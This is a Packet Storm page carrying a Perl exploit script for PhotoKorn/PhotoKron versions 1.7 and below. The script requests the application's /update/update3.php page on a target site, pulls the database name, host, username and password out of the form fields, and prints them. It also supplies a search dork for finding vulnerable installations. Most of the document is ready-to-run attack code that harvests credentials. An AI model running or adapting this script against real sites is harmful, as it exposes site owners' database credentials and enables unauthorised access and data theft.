PhotoKron versions 1.7 and below remote database disclosure exploit.
dc7244d244ac85289a8de2112071008c5e8c029a9d60e9950a7ee877cc0895d7#!/usr/bin/perl
#Script : PhotoKron All Version
#All Version
#Author : Pr0metheuS
#Gr33tz to Gr33tz-Team
#Gr33tz-Team.ORG
#Dork : "Powered by photokorn"
### INFO ##
# Works IF /update/ is on server...60% site are vulnerable....
## INFO ##
use LWP::UserAgent;
if (@ARGV!=2) {
print "-=-=-=-=-=-=-=-=-=-=-=--=\n";
print "PhotoKorn Remote Database Info\n";
print "by Pr0metheuS\n";
print "perl $0 <site> <path>\n";
print "-=-=-=-=-=-=-=-=-=-=-=--=\n";
}
(my $site,my $path)=@ARGV;
my $ua = new LWP::UserAgent;
$ua->agent("Mozilla/8.0");
$ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(GET => "".$site."".$path."/update/update3.php");
$req->header('Accept' => 'text/html');
my $res = $ua->request($req);
my $con = $res->content;
if ($res->is_success) {
print "-=-=-=-=-=-=-=-=-=-=-=--=\n";
print "PhotoKorn Remote Database Info\n";
print "by Pr0metheuS\n\n";
if($con =~ /<input type="text" value="(.*)" name="dbname">/){
$dbname = $1;
print "[+] DBNAME : $dbname\n";
}
if($con =~ /<input type="text" value="(.*)" name="dbhost">/){
$dbhost = $1;
print "[+] DBHOST : $dbhost\n";
}
if($con =~ /<input type="text" value="(.*)" name="dbusername"><\/td>/){
$dbuser = $1;
print "[+] DBUSER : $dbuser\n";
}
if($con =~ /<input type="password" value="(.*)" name="dbpassword"><\/td>/){
$dbpass = $1;
print "[+] DBPASSWORD : $dbpass\n";
}
print "-=-=-=-=-=-=-=-=-=-=-=--=\n";
}
else{
print "[+] Exploit Failed...\n";
}
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed